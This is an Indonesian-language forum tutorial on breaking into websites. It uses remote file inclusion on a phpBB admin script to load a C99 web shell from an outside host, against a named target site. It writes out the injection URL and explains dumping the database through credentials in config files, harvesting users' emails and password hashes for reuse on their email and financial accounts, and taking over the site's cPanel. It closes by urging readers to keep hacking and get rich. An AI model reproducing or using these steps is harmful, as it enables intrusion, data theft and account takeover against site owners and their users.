Sedikit Masukan Tentang Hacking Situs Dengan Exploit/bugs
Ok, nihh cuman buat pelajaran aje... hehehehe... gw kasih tau ndikit bagi yang belom tau...
Nah anak2... xixixixixi
skarang kita bakal peraktek gimana caranye ngenjebol website dengan mengunakan tehnik Inject/suntik dengan Shell C99
Script C99 sementara ini bisa lu liat di
http://valentine4nura.com/random.x
target kita adalah kelemahan pada Forum PhpBB
Okeh
target hari ini
http://www.wybrzeze.gda.pl
Yang kelemahannya ada di "Forums/admin/
admin_db_utilities.php"
pada variabel :
= TRUE;
phpbb_root_path = "./../";
require( . 'extension.inc');
require('./pagestart.' . );
include("./../../../includes/sql_parse.php");
//
// Set VERBOSE to 1 for debugging info..
//
define("VERBOSE", 0);
//
// Increase maximum execution time, but don't complain about it if it isn't
// allowed.
//
@set_time_limit(1200);
Okeh time to rock babe...
)
ketik:
hxxp://www.wybrzeze.gda.pl//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
kemudian tekan enter
maka akan keluar warning message ...
heheheheh :evil:
skarang masih ingat kan Script Shell C99 tadi...?
okeh
skarang langsung Inject jadi
hxxp://www.wybrzeze.gda.pl//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://valentine4nura.com/random.x?
muahahahaha
maka script C99 tadi yang awalnya berbentuk TXT berhasil di RUN di hostingan
http://www.wybrzeze.gda.pl pada file
admin_db_utilities.php dengan mengunakan variable
phpbb_root_path=
hehehe nah setelah lu masuk lu bisa mencuri Database SQL dari situs itu
atau mencuri Cpanel Login.. gimana caranya..?
Okeh
1. Trick mencuri (dump) db:
biasanya Login DB (user,Pass,DB name,host name) tersimpan pada file2 : config.php ,config.inc.php , setting.php ,global.php,db_connect.php... tapi kali ini sengaja saya kasih sample situs yang lumayan terproteksi xixixixi supaya elu2 ga macem2in situs itu.. kasian man...
klik "SQL" pada Top menu yang ada di C99
maka dia akan menanyakan USER DB ,PASS DB , DB NAME ,DB SERVER (biasanya Localhost) nah masukan data2 yang udah kamu dapat dari file2 yang gw udah gw sebutin memiliki (user,Pass,DB name,host name)
Jebol deh... skarang lu bisa liat sapa aja yang register di Situs itu (email+Hash MD5 Passwordnya, dll) dan dalam beberapa kasus contohnya Exploit/ situs yang mengguakan Scipt "AMEMBER" password yang ada di database tidak di encrypt jadi kamu bisa liat password mereka (tahukah kamu 70% orang menggunakan password yang sama pada setiap kali mereka register..?) jadi kemungkinan besar kamu bisa login ke email mereka malah ke Situs financial mereka muaahahahahaha bahaya kan...? makanya saran saya Buat password khusus untuk register ke forum / register ke situs2 penting financial anda ... jangan disamain semua....
2. Trick Mencuri Cpanel
Situs2 yang mengunakan Cpanel bisa lu liat di kiri atas C99
bentuk Directory Situs CPANEL biasanya
/home/
USERNAME/public_html
nah sekarang kamu udah tau USERNAME sang pemilik situs itu...
dalam kebanyakan kasus Provider Hosting /atau si Webmaster itu sendiri menggunakan Password yang sama untuk Password Cpanel dan SQL jadi sewaktu kamu mendapat kan Password Database SQL dari file2 yang gw sebutin di atas maka kamu berkesempatan untuk masuk ke Cpanelnya juga hehehehe
Okeh sekarang tinggal coba2 login ke Cpanel
www.namasitus.com/cpanel atau
www.namasitus.com:2082 trus coba deh enter ... xixixixi...
nb: Cpanel= Control panel suatu situs.. jadi lewat itu kamu bisa Upload/Set Chmod(permission) buat suatu file tanpa mikirin safe mode Off apa ON...setelah km berhasil masuk ke cpanel yah selamat menjadi dewa di suatu situs muahahahahahaha.....
yah ini cuman sedikit debu dari arti HACKING yang sebenarnya muahahahaha...
untuk yang lain2 silahkan di cari sendiri...
KEEP HACKING AND GET RICH
saluut I2 yang tmbh rame 
